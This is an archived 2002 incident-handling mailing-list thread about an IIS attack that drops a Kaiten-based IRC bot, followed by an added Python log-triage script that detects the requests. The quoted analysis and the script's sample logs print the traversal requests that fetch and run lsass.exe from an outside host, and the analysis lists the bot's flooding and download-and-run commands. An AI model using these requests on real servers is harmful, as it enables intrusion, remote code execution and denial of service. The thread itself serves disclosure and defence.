RE: new IIS worm? (rcp lsass.exe)

From: John Campbell (jcampbell@wsipc.org)
Date: 09/24/02


Date: Tue, 24 Sep 2002 14:41:28 -0700
From: "John Campbell" <jcampbell@wsipc.org>
To: "zeno" <bugtraq@cgisecurity.net>

I actually prefer the opportunity to pick and choose. Not all hotfixes
are necessary for a given installation, and historically at least, they
aren't regression-tested as fully as service packs (which aren't
always perfect when they hit the street either).

If you do a lot of servers, it may make sense to set one up manually,
test it thoroughly, then clone it with a disk imaging tool.

-----Original Message-----
From: zeno [mailto:bugtraq@cgisecurity.net]
Sent: Tuesday, September 24, 2002 2:08 PM
To: John Campbell
Cc: incidents@securityfocus.com
Subject: Re: new IIS worm? (rcp lsass.exe)

>
> Windows Update from you-know-who actually does what you describe. I'd
> always been leery of it, but tried it out recently when setting up a
> W2K test server, and it performed as advertised. It did take several
> iterations to get everything updated, owing to various dependencies.

When I used Windows Update it downloaded the patches but didn't install
them. I had to manually go through each one. While this isn't a big deal,
I am looking for something 100 percent automated, with install of the
patches. Perhaps I'm missing something; I deal mostly with Unix.

- zeno

>
> Regards,
>
> John Campbell, CISSP, GCWN
> Information Security Engineer
> Washington School Information Processing Cooperative
> (WSIPC)
> Everett, Washington, USA
>
> -----Original Message-----
> From: zeno [mailto:bugtraq@cgisecurity.net]
> Sent: Tuesday, September 24, 2002 11:29 AM
> To: Mark Challender
> Cc: 'pj@esec.dk'; incidents@securityfocus.com
> Subject: Re: new IIS worm? (rcp lsass.exe)
>
>
> >
> > Hardening of IIS with the tools available at Microsoft and using
> > URLSCAN with the EXE blocking on will stop these attacks.
> >
> > Patch, patch, patch, recheck the patches and use URLSCAN!
>
> Does anyone know of a gui windows tool that scans your system and
> provides you with a list of needed patches, and then allows you to
> select, and have it autodownload and install them? I can't seem to
> find one (needed mostly for iis).
>
> - zeno@cgisecurity.com
>
>
>
> >
> > Mark Challender
> > Network Administrator
> >
> > ==================
> > Veni, Vidi, Geeki
> > ==================
> >
> >
> > -----Original Message-----
> > From: pj@esec.dk [mailto:pj@esec.dk]
> > Sent: Monday, September 23, 2002 3:27 AM
> > To: incidents@securityfocus.com
> > Subject: Re: new IIS worm? (rcp lsass.exe)
> >
> >
> >
> > Christian Mock:
> >
> > >Then it seems to go after the web servers, sending the following:
> >
> > >GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0..
> >
> > >and
> >
> > >GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
> >
> > >I've been able to get hold of that lsass.exe binary (9728 bytes), but
> > >I lack the skills to analyze it; I'll happily mail it to anybody who
> > >asks.
> >
> >
> > We have seen this attack from 4 different sources since Sept. 16, and
> > have informed the owner of 64.21.95.7 and downloaded the lsass.exe for
> > investigation.
> >
> > Based on the attack rate this is most likely a scripted or manual
> > attack, not a worm.
> >
> > Judging from the embedded string in this compressed binary it
> > appears to be an IRC bot based on the kaiten.c code written by
> > contem@efnet, the author of the Slapper worm:
> >
> > Kaiten Win32 API version 2002 by contem@efnet
> >
> > The binary contains these domain names, most likely IRC servers used
> > for controlling the bot:
> >
> > telsa5.mine.nu (Korea)
> > irc.logicfive.net (Taiwan)
> > moncredo.shacknet.nu (USA)
> > telsacredo.shacknet.nu (USA)
> > lar.ath.cx (Taiwan)
> >
> > The program accepts commands to make various DoS attacks or download
> > new versions or executables via HTTP:
> >
> > NOTICE %s :PUSH <target> <port> <secs> = A push flooder
> > NOTICE %s :TCP <target> <port> <secs> = A syn flooder
> > NOTICE %s :UDP <target> <port> <secs> = A udp flooder
> > NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder
> > NOTICE %s :NICK <nick> = Changes the nick of the client
> > NOTICE %s :DISABLE <pass> = Disables all packeting from this client
> > NOTICE %s :ENABLE <pass> = Enables all packeting from this client
> > NOTICE %s :UPDATE <http address> = Downloads a file off the web and updates the client
> > NOTICE %s :RUN <http address> = Downloads a file off the web and runs it
> > NOTICE %s :GET <http address> = Downloads a file off the web
> > NOTICE %s :ADDSERVER <server> = Adds a server to the list
> > NOTICE %s :DELSERVER <server> = Deletes a server from the list
> > NOTICE %s :LISTSERVERS = Lists server on the list
> > NOTICE %s :KILL = Kills the client
> > NOTICE %s :VERSION = Requests version of client
> > NOTICE %s :HELP = Displays this
> >
> >
> > There seems also to be a default account and password in the German
> > language included in this specific version of Kaiten.
> >
> > The IIS attack that tries to inject this Trojan usually has another
> > URL with "CONNECT chat.vtm.be:6667". This is an attempt to proxy a
> > connection to port 6667 (IRC) on chat.vtm.be.
> >
> >
> >
> > Peter Jelver
> > ...
> >
> > eSec A/S
> >
> > http://www.esec.dk
> >
> >
> > PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A 128F D85C A7D7
> >
> >
> >
> >
> >
> > --------------------------------------------------------------------------
> > This list is provided by the SecurityFocus ARIS analyzer service.
> > For more information on this free incident handling, management
> > and tracking system please see: http://aris.securityfocus.com

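As an added example (not code from the thread or from any of its authors), here is a small Python triage script that flags, in IIS-style log lines, the request shapes Peter Jelver describes above: the `..%5c` traversal into cmd.exe and the CONNECT attempt toward an IRC port. The log layout, client IP addresses and sample lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in a simplified IIS W3C layout (not from the thread):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2002-09-23 03:27:01 10.0.0.5 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+rcp+-b+64.21.95.7.lp:lsass.exe+. 200
2002-09-23 03:27:02 10.0.0.5 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+lsass.exe 200
2002-09-23 03:27:03 10.0.0.5 CONNECT chat.vtm.be:6667 - 405
2002-09-23 03:28:10 10.0.0.9 GET /default.htm - 200
2002-09-23 03:28:11 10.0.0.7 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir 404
"""

TRAVERSAL = re.compile(r"\.\.[\\/]")          # ../ or ..\ once decoded
CMD_EXE = re.compile(r"cmd\.exe", re.IGNORECASE)
IRC_PORT = re.compile(r":(666[0-9]|7000)$")   # common IRC ports

def decode_twice(s):
    # Decode twice so double-encoded forms such as %255c also collapse to '\'
    return unquote(unquote(s))

def classify(line):
    """Return (client_ip, sorted tags) for one log line, or None if it does not parse."""
    fields = line.split()
    if len(fields) < 7:
        return None
    ip, method, stem, query = fields[2], fields[3], fields[4], fields[5]
    target = decode_twice(stem + " " + query)
    tags = set()
    if TRAVERSAL.search(target):
        tags.add("traversal")
    if CMD_EXE.search(target):
        tags.add("cmd.exe")
    if method == "CONNECT" and IRC_PORT.search(stem):
        tags.add("irc-proxy")
    return ip, sorted(tags)

def scan(log_text):
    """Return {client_ip: sorted tags} for every client with at least one hit."""
    hits = {}
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed and parsed[1]:
            hits.setdefault(parsed[0], set()).update(parsed[1])
    return {ip: sorted(t) for ip, t in hits.items()}

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG).items():
        print(ip, tags)
```

Clients that trip both the traversal and the CONNECT rule are the ones worth checking first for a dropped lsass.exe.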


